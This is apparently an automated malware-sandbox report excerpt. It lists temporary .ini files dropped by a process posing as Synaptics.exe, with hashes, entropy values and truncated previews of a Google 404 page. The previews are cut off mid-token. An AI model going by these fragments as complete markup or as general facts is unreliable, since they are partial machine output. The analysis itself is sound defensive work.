                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="0x8yB5d5edax8bfvBnnb5Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\idtFBGq.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.247214957520749
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0TSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+k+pAZewRDK4mW
                                                                                                                                                      MD5:0532E10200E6A4DE43C4AE493C4BFCFE
                                                                                                                                                      SHA1:E43DC7C43788681CBC5DA7B5942379AD057B931F
                                                                                                                                                      SHA-256:CF57E05DEE9D3429432956D19F6389DE4B0DB242C5472FF8E7A5C4E1C2B9DDA9
                                                                                                                                                      SHA-512:09D116B4B86D808D155A935DD3002FA4433B50133607F4BA893E83F4EC3B925CD9D58559FFDB439FD705E474C5CA0C0D9A5A73305BEBD154349D7313C383510D
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="p1piihUXp-_0y3NP1eAjtg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\juC9tN4.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.274929752388672
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0dLSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+kL+pAZewRDK4mW
                                                                                                                                                      MD5:1B660E533DBD03F2B98F869CE07C419F
                                                                                                                                                      SHA1:0A2765CBE3F53C96E46EE5B5057DCC313B5505AE
                                                                                                                                                      SHA-256:6B81DCB395992C900B6FEC81A2612FA82211A4B028F96CC1DD18EC85B2722366
                                                                                                                                                      SHA-512:EE319B2B66A6CC0022106E587609C6E7146536DDE9897EA412940FF4877F438035DCB89CD1A7C7A4E0B096F405AED86A1FC7C218C76346007A8DBB11D3ECC621
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="My6OmzumQ7dhOA9BSVgRPA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\kVRLa37.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:modified
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.265647799970668
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0uM4bSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+NMS+pAZewRDK4mW
                                                                                                                                                      MD5:4FE9AA1F44BDB72D210129D456F9FDF2
                                                                                                                                                      SHA1:F58D86119E2657177BE8CB8933BC1399BDD3DB5B
                                                                                                                                                      SHA-256:1898A9183DE3455E0DEEF9247F9FD52CD99C91819C767B39CC1A2671E3A714E0
                                                                                                                                                      SHA-512:4DCE4E4DB27E475938A1A06648971499297374F5F340CBE8166E5F527F481A7928C85D00FE170F354DA21C900BE95626FE276A810C2AD7256BD871F1B8969983
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="WO18zMwnNfjDaZM0Nwvo5Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\lZuJcWd.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.261348496706126
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0s7DSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+/f+pAZewRDK4mW
                                                                                                                                                      MD5:4E2A4536B47DF85CC6A84ECAE9A67D93
                                                                                                                                                      SHA1:7D0425EBF6999FF5A25B4F2D0E3399A0198C6AFA
                                                                                                                                                      SHA-256:06EA610A15BB951B309BAE8D48D45B285FABC4074EA3E44D61B7AB5A9ACA0514
                                                                                                                                                      SHA-512:AA5836FE796BCDF359B2F02F84477FB8DBE826C5F5FCF25834692A0ABB4E90017C04CE8A1C963FF739EC36C75B5022B64329194BE97F421FBC5DFD4CB7F57A8B
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="npMkWTbWL3cOkRxeY56tCw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\lqlcWby.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.2792476598843585
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0xqSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+D+pAZewRDK4mW
                                                                                                                                                      MD5:ED2D8DB0A35A4118C5C77724B20D47FB
                                                                                                                                                      SHA1:772CBE595202331C8C722B7636D170BC6DE64759
                                                                                                                                                      SHA-256:B356500E50DF2B595EAB9F1453C8D6F7A3E9644BBB79B0C89AD6FCDAC2D46F64
                                                                                                                                                      SHA-512:45A92596A2B283D640F566E93AD6420D5AF3E8EC9069A0FC797E63BCEDDB9EF5D2F19B41EF52C920E2909E6A14E3CEFCCD11084A8E479643593E9F220D757D70
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="PfItKLBf7ZVA6_yHEnWoEQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\lsNmCAd.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.266643483013398
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0HSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+s+pAZewRDK4mW
                                                                                                                                                      MD5:BAECBEEE8206149BD6E6B652D3D358A0
                                                                                                                                                      SHA1:CCE6C65D696B6A6EC55EBF047F093757D2D6E6FF
                                                                                                                                                      SHA-256:87800AEB58E1F5F1AA774E03CFD0F324D9D99C6251ACFE7EE306ADF70208E7A3
                                                                                                                                                      SHA-512:39F136B9117235C7BBAA5FD0175A46E2533F1CA40933C8BCF17A9D24D7E8FDB135B3F8910807BB8E2C4930E87F6986629EB613FB3A18BEBFDF8BA80D2205A2C3
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="FzAmSQt4krxT4MyD5AkLQA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nLizuBC.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.260134997832926
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0VWSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+KW+pAZewRDK4mW
                                                                                                                                                      MD5:4AE06D89028DDAD6F13BCD658F8F15EE
                                                                                                                                                      SHA1:75ABD5012869974513C71AD2D1521DBE22EA8283
                                                                                                                                                      SHA-256:06B0E3CCDF084C05606C981A8A0CD4B3982BD6BB27AE3714AC90DBDD9A479836
                                                                                                                                                      SHA-512:18E1AFBFA9FB88400B92A9F6D20D08D515FFCB44B41E441EED92D23210FB5A54C797E19282ACBB39C56439B069B3CFBD92BED99BA48A9C6F4631728243C37FBC
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Csyedxe-89PSGbtWvij8QQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\oKBLtWT.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.269813993210103
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0hISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+R+pAZewRDK4mW
                                                                                                                                                      MD5:BA3C85EB3F2B13F64602EC06779EABA6
                                                                                                                                                      SHA1:6F592600D1C91CD85CA63FB58EEBDACCEE14BD40
                                                                                                                                                      SHA-256:E0928979FEB36976DCEDDC1570237D68677C687991DB1BFF1328666E44BB5F54
                                                                                                                                                      SHA-512:7DFAAC5647B9CC425FE3532BD8AD04D4415BAB508CE0E3DD4EE756953F67DEE277CB6DC343629F6D369CB0D9F41CBA7472B9AD4BCDEC678FB7FA642E74BB9E1A
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="kY0xuRZLnPSEHIcJXXn-Nw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\pMytm6z.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.264403788403859
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+03SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+s+pAZewRDK4mW
                                                                                                                                                      MD5:7DE3F7014B994B2B2487B23476C402CF
                                                                                                                                                      SHA1:55DF203C22F0CF6FCD0B4537F08641E37E16F197
                                                                                                                                                      SHA-256:5173D3021316822D040C372C23AAC77B94DD87BC87051B8DDFCD652C723C2BE8
                                                                                                                                                      SHA-512:F1A065BCAC31705F3329F214BA0A4F5F369495BB5903E2B3DA2ABABCF146553DDB6A8AFD1CC0C61A82044F3E7BA7BF55440BB9652F769B99FD1A73CE1014AFE3
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="NPuXlfLevZK8k1Wf2yqUTg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\psbKVAc.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.258866119062151
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0dihgSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK++i2+pAZewRDK4mW
                                                                                                                                                      MD5:7C5EC07B2654049A826D23EB34AC9974
                                                                                                                                                      SHA1:10834EF578E8D3A23DE82CB652CEABD41F7D9F33
                                                                                                                                                      SHA-256:D7E0F574086DDD8D94C6350DC0A443FD3FAE751BDD02D4306F295D6785E3BABB
                                                                                                                                                      SHA-512:41767065C77E1B13ADC247A3E1DE8F6800D9785BF6B5A0B2A79EF0BC914F68658D9683DAB565DF43FF67A3E9717BCEA183710D445FF12212F72CC7187717930C
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="XnsQ0r36J5pDkLwTTcbvBw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\qLYV3g3.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.2658623621319816
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+08SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+L+pAZewRDK4mW
                                                                                                                                                      MD5:85F81811D5EC52C0B92E8670DCD2892A
                                                                                                                                                      SHA1:D93590112069D2C76C43FEE8A2516A602E393DDE
                                                                                                                                                      SHA-256:310EDF685CB22FB15376A2C034269D7B8B50FAB2D8DF87DE9A8AEB1D5EDE1645
                                                                                                                                                      SHA-512:7B393BCA440A91A0193E828AA5DDF629341807A831EBFE0983C0216EB86282530B7212E80B6B5772CD498A4713C830E3C97F12985E038DF1F2AB85F8EFD0C00A
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="sR9yp9ufUDyjVJfsgMZFFg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\qpvKhH6.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.263877195545431
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0EFDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+vR+pAZewRDK4mW
                                                                                                                                                      MD5:A9894A75B0026FEF17B4C6D46A38A954
                                                                                                                                                      SHA1:5CBAF6E673DF478D1EFE078EFA5B869B7520D042
                                                                                                                                                      SHA-256:8E609927A583E748ADF76FC31A7B47BF13B9EAA4182F1817766B4F3EC43059BB
                                                                                                                                                      SHA-512:45C9317F4C3E66F1374FEEC0D0708039F12014E0068D33041315C6887235E6043FAE13A5FEDCE1F9FFEB4D838CF644E67D7002DD99CA972359B372F311362FC1
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="k7mIKH61oq-y9ujFG2NlSg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\rcz8JAV.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.259698752901752
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0+wbSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Sb+pAZewRDK4mW
                                                                                                                                                      MD5:C9CA3E4EFA793D9481CB5829BC357BF6
                                                                                                                                                      SHA1:4A4E8969766980FF32E31BD41A4769F4C4CB0861
                                                                                                                                                      SHA-256:1B52327FAB2CD022A0F3BB76DC3A25C8A67A67D02042DFCF935F9D0D17DE825C
                                                                                                                                                      SHA-512:18532208B249247C5BA30B5E5CC4626EAE582D3765D9D4CC79EE27C26D3B624F18D74F634F6A41CAFF4AF34DB44CBEE36B9A93C2A5D006A4326B7E78ABE81326
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="3hcNW-x9k96nn8nj5NZDWg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\sS24ahP.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.268491781177297
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0YSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+X+pAZewRDK4mW
                                                                                                                                                      MD5:A33BB1B6969C11A2F6E8D4699B7E05CE
                                                                                                                                                      SHA1:8BF6D83C371C1CC5062355B178EE99E632BEC3D8
                                                                                                                                                      SHA-256:8F58610246B5FB86089B75314364634A75427EE7F411B83B641B2E4912C352D1
                                                                                                                                                      SHA-512:913FBB1F6D51CAAA451F48482798343D7EE39686B665910338527E4BDAEA9903330CD9592E012636E6F2C2DD8124A917C8A4463C2FF01303039EEEE63F93C61D
                                                                                                                                                      Malicious:false
